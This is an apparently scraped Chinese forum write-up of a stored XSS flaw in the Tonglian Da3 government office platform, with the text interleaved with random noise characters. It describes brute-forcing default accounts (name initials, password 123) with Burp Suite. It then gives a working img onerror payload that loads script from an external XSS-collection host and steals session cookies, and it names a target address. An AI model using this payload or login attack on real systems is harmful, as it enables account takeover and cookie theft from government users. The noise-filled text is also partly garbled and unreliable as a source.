3 H( H9 k5 E V; N6 k) ?2 m% M + p2 j4 ^6 \1 G$ r* x8 h
同联Da3协同办公平台后台通用储存型xss漏洞
- R* U( W6 n$ v2 [* k: O, j) u
. e' g" [9 E8 l
1 s. {" q X# O 平台简介:
# o# t- i1 t7 i Q3 p& z
& g- ^& N" V% n' P) B3 l 9 Q N: a1 F- Z: {; v- {. U
$ ?3 j$ j0 K0 y2 m- `
/ d. S, K/ b3 }) O! a
2 d( t0 F9 p& r! ] 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
Z0 I8 O( N$ C9 H2 }
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, Q! v1 @) i1 k同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
9 [, k: B; ^5 A9 Y
/ l Y6 f# s8 M9 h, ?2 p! a. e
* l! Z$ C8 A( L! F6 P3 `9 h$ {
" p J" O' R: P+ ^4 i
! x* a% `8 G# z% W$ S
- {1 P4 v% ~" `8 u% i 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:8 l. k) g9 ^- J
' K3 M% b7 V8 G# A7 B. o$ b! H1 [+ U : B0 S' C$ G d6 E1 ?3 G
) Z8 q; O" K, k1 M0 c
. V9 c+ y0 b0 w. Y* T0 l ( U; @; M4 J* w: r1 q' V
http://1.1.1.1:7197/cap-aco/#(案例2-)3 w( M' F- D0 w# g3 y) A
c6 @ c8 S" n9 E0 ?/ v2 G ! _' R2 S% {, s" H& d
http://www.XXOO.com (案例1-官网网站)
, n. R/ ? k @4 R! {
, f+ c. l- s. Q2 \/ c+ ]
6 v: r( A" s4 l9 `4 _2 E4 I 漏洞详情:' v( G: ?- Z# m q9 M& Q
' G% G% I) `, i* s- B
& J8 ] y" [( y W' f* D
案例一、% K2 j: C Z, A+ f9 J% {+ [" H
C% f$ q; w7 B7 d! P8 Q ?' i" W
" T4 e" R) F! k$ e! U 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试* e6 Z2 g i! S
$ u4 C2 O- A: Z' l, [7 a
2 o2 p+ n$ |% q& r, r1 K0 d
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
1 g3 r! J' W0 W5 s% v" X
1 ^8 V& y, r* z! `* X7 |) p
% R2 r7 P8 u: e
1 E, \5 k2 `; m9 c4 M7 b
* d K- R* H% t T
" G V: A. Y. Q, C+ Z; p
& F) |) E. F/ a# z+ g6 w/ Z
$ Q% a) J/ q3 d9 g0 ~2 E
' B( A8 E! {7 i7 X# u* t5 y# T
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ; a& |' r$ x# B4 P& S% G
6 l% O# C9 p* j
2 j \) ]* g9 k# U+ @# V
, R- O5 n* C$ V$ F5 }. K2 W
# s9 J* ~7 W9 J6 I# N
! K% R1 ]/ m; [* D7 J9 p: Y/ {7 q
: \' i0 o8 y! F
/ ~( k4 X4 o/ M5 i! J
! I6 k/ W. W0 c/ W 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 7 Q; D1 s" Q* \: d5 d0 m0 _. a
. U8 F# H f2 `0 E
# c3 ?5 q; @6 I : Q- I: z- G* Z, g: ?) C/ c
5 P5 x( m/ Z' p/ {; `7 T
g. J7 D6 a6 k6 c$ I <img src=x
8 Z) q) a O1 h5 [onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
0 c' [* N; P; k) R% f
A6 p7 ?; a% ^; _, o7 M
( r+ X, s* }/ Q( O, X% B& Q; W
; t2 k, U. c& c
7 o; G1 e2 H, [. Z
2 C* f# d p. L3 B0 ]2 Y5 z ] 然后发送,接收cookie如图: ; J+ ]- D4 C5 F/ T
# {( J* {+ L! S. o% j
- j# G6 P4 C9 @! O( T6 ` % q3 M# u. g7 x; T* N
: l) [' r7 a2 v! m: v/ S2 @
1 C. |3 ?) {% O 7 V. q& K2 I5 I1 A3 J- C
' \ s& A% S2 z7 M9 q7 a9 B
" Q4 \( I; z5 ]' B4 p
8 K$ ?& Q/ i! _. M
: Y" d+ w0 d6 J) I + U; x, ^) x# r( U4 D, m
: R8 ]( S5 S1 f! G" ]
$ a" q1 e- v- l1 V
% e+ A; v! `9 J$ y& U
8 X4 J. ?$ ]# {
L2 b- O, i# ]* Y- W T( S; g8 X ) I# s- Q5 v" q
. Q' R- A }4 \( Y( ?3 {0 _& ?
# A8 L8 C* i g4 B! ^
0 k! L3 P' R( g! J & l" }4 B* q# k& I/ p h; H
, ^% k" z) R4 _% g8 y
# \4 t2 o7 D2 H) d6 j3 W h 案例2、 " Q2 a0 G! f% f
% F# X d* Y% U( X# U
" M+ v+ ~1 c5 E h8 @8 H% j: a: R# T7 x 前面步骤都一样,下面看效果图:
) U9 W6 z }( u" o: X
1 s0 f" d' y4 G, i* L . k1 P3 c/ k# _* Y0 z; e: y
& T; C6 t2 W/ P$ Z1 J5 b! f
/ ^8 _6 i) Q2 f0 F
+ t: h% `: S" \1 f# F
; N8 J) ~, }% b+ _* X
3 }3 {# o2 L( R) F
; b) [/ y9 ~/ |. _5 b1 S * N% d% E& R8 z$ S! _0 i
# q' i* M) q; i# Z
6 i( F w) \) f9 N) ?7 Z! a2 g# g
' z" [3 u) j& L2 Y
! h/ G' Z1 B0 p) t- b% d/ e 1 h5 J( i" T$ i
& F( G4 W6 m, e7 s
/ F' @. ^3 ?- k) ~
6 u, K( C( z9 L9 p( [, S
, E% j* ^. B3 C" `) [' W; H" s
7 A- R/ D* x1 R
) A$ O0 {: o& ]0 r! T
" {% V7 P+ e J0 x3 K* k3 D8 c8 V
$ b1 H" k) y/ F; w ^5 G: h2 ?( O
+ a" F# D" R# K+ I( Q* e7 }1 V " G: T2 ?. i) j/ X3 r
5 x; ]3 I/ l! l* S! X
2 m) k$ }1 M9 P0 i' B* w- n2 L+ ]
0 d* f3 J# E4 F5 e. L
+ Y1 a) |8 M3 ^: Z3 B* p @